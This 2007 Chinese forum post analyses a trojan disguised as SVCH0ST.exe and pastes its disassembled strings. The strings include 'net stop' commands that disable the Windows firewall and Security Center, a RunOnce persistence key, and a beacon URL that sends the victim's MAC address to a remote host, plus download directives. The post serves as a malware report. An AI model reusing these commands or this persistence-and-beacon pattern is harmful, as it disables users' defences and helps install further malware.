开机自启动,不断变换进程pid,关闭系统防火墙,在下木马
好像还会修改ip
附代码- 00407F6D PUSH SVCH0ST.00407FA4 ASCII "kernel32.dll"
- 00407F7D PUSH SVCH0ST.00407FB4 ASCII "GetDiskFreeSpaceExA"
- 00407FA4 ASCII "kernel32.dll",0
- 00407FB4 ASCII "GetDiskFreeSpace"
- 00407FC4 ASCII "ExA",0
- 00408541 ASCII " *@@* $@@($*)@-$"
- 00408551 ASCII "*@@$-*@@$*-@@(*$"
- 00408561 ASCII ")@-*"
- 00408566 ASCII "@@*-$@@*$-@@-* $"
- 00408576 ASCII "@-$ *@* $-@$ *-@"
- 00408586 ASCII "$ -*"
- 00408CEC MOV EDX,SVCH0ST.00408D2C ASCII "0x"
- 00408D2C ASCII "0x",0
- 00408D70 ASCII "http://count.hdp"
- 00408D80 ASCII "xzx.cn/inc/",0
- 00408E68 PUSH SVCH0ST.00408EC4 ASCII "SeRestorePrivilege"
- 00408EC4 ASCII "SeRestorePrivile"
- 00408ED4 ASCII "ge",0
- 00409009 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
- 0040901C MOV EDX,SVCH0ST.00409160 ASCII "HIV"
- 00409034 PUSH SVCH0ST.00409164 ASCII "SOFTWARE"
- 00409047 PUSH SVCH0ST.00409170 ASCII "Microsoft"
- 00409059 PUSH SVCH0ST.0040917C ASCII "Windows"
- 0040906B PUSH SVCH0ST.00409184 ASCII "CurrentVersion"
- 0040907D PUSH SVCH0ST.00409194 ASCII "RunOnce"
- 004090A9 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
- 004090E4 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
- 00409150 ASCII "\haojing.hiv",0
- 00409160 ASCII "HIV",0
- 00409164 ASCII "SOFTWARE",0
- 00409170 ASCII "Microsoft",0
- 0040917C ASCII "Windows",0
- 00409184 ASCII "CurrentVersion",0
- 00409194 ASCII "RunOnce",0
- 004091D6 MOV EAX,SVCH0ST.0040920C ASCII "No computer name"
- 0040920C ASCII "No computer "
- 0040921C ASCII "name",0
- 0040929D MOV EDX,SVCH0ST.00409488 ASCII "00-00-00-00-00-00"
- 004092D9 MOV EDX,SVCH0ST.004094A4 ASCII "\"
- 004092EB MOV EDX,SVCH0ST.004094A4 ASCII "\"
- 004092FF PUSH SVCH0ST.004094A8 ASCII "NETAPI32.DLL"
- 00409316 PUSH SVCH0ST.004094B8 ASCII "NetWkstaTransportEnum"
- 00409326 PUSH SVCH0ST.004094D0 ASCII "NetApiBufferFree"
- 0040939F MOV EAX,SVCH0ST.004094EC ASCII "TCPIP"
- 00409488 ASCII "00-00-00-00-00-0"
- 00409498 ASCII "0",0
- 004094A4 ASCII "\",0
- 004094A8 ASCII "NETAPI32.DLL",0
- 004094B8 ASCII "NetWkstaTranspor"
- 004094C8 ASCII "tEnum",0
- 004094D0 ASCII "NetApiBufferFree"
- 004094E0 ASCII 0
- 004094EC ASCII "TCPIP",0
- 0040950D PUSH SVCH0ST.00409578 ASCII "Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE"
- 0040955C MOV EDX,SVCH0ST.004095C8 ASCII "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
- 00409578 ASCII "Software\Microso"
- 00409588 ASCII "ft\Windows\Curre"
- 00409598 ASCII "ntVersion\App Pa"
- 004095A8 ASCII "ths\IEXPLORE.EXE"
- 004095B8 ASCII 0
- 004095C8 ASCII "C:\Program Files"
- 004095D8 ASCII "\Internet Explor"
- 004095E8 ASCII "er\IEXPLORE.EXE",0
- 0040962F MOV EDX,SVCH0ST.00409678 ASCII "cmd /c "
- 00409678 ASCII "cmd /c ",0
- 004096BE MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
- 004096ED MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
- 0040972F MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
- 0040975E MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
- 004097A4 ASCII "\SVCH0ST.exe",0
- 004097D7 PUSH SVCH0ST.00409BDC ASCII "net stop wscsvc"
- 004097E3 PUSH SVCH0ST.00409BEC ASCII "net stop sharedaccess"
- 00409894 PUSH SVCH0ST.00409C14 ASCII " http://count.hdpxzx.cn/count.jsp?id="
- 0040989F PUSH SVCH0ST.00409C44 ASCII "&mac="
- 004098AA PUSH SVCH0ST.00409C54 ASCII "&te="
- 004098B5 PUSH SVCH0ST.00409C64 ASCII "&fc=fc"
- 004098E5 PUSH SVCH0ST.00409C74 ASCII "fc"
- 004098FA PUSH SVCH0ST.00409C80 ASCII ".txt"
- 00409914 PUSH SVCH0ST.00409C74 ASCII "fc"
- 00409929 PUSH SVCH0ST.00409C80 ASCII ".txt"
- 00409A31 MOV EDX,SVCH0ST.00409C9C ASCII "[downfile]"
- 00409A49 MOV EDX,SVCH0ST.00409CB0 ASCII "[openurl]"
- 00409AEE PUSH SVCH0ST.00409CC4 ASCII "\KB"
- 00409AF9 PUSH SVCH0ST.00409CD0 ASCII ".log"
- 00409BDC ASCII "net stop wscsvc",0
- 00409BEC ASCII "net stop shareda"
- 00409BFC ASCII "ccess",0
- 00409C14 ASCII " http://count.hd"
- 00409C24 ASCII "pxzx.cn/count.js"
- 00409C34 ASCII "p?id=",0
- 00409C44 ASCII "&mac=",0
- 00409C54 ASCII "&te=",0
- 00409C64 ASCII "&fc=fc",0
- 00409C74 ASCII "fc",0
- 00409C80 ASCII ".txt",0
- 00409C90 ASCII "",0
- 00409C9C ASCII "[downfile]",0
- 00409CB0 ASCII "[openurl]",0
- 00409CC4 ASCII "\KB",0
- 00409CD0 ASCII ".log",0
- 00409CE0 ASCII " ",0
- 00409DDF PUSH 0FF (初始 CPU 选择)
- 00409E08 MOV ECX,SVCH0ST.00409E70 ASCII "\SVCH0ST.exe"
- 00409E70 ASCII "\SVCH0ST.exe",0
复制代码
[ 本帖最后由 promised 于 2007-9-21 19:31 编辑 ] |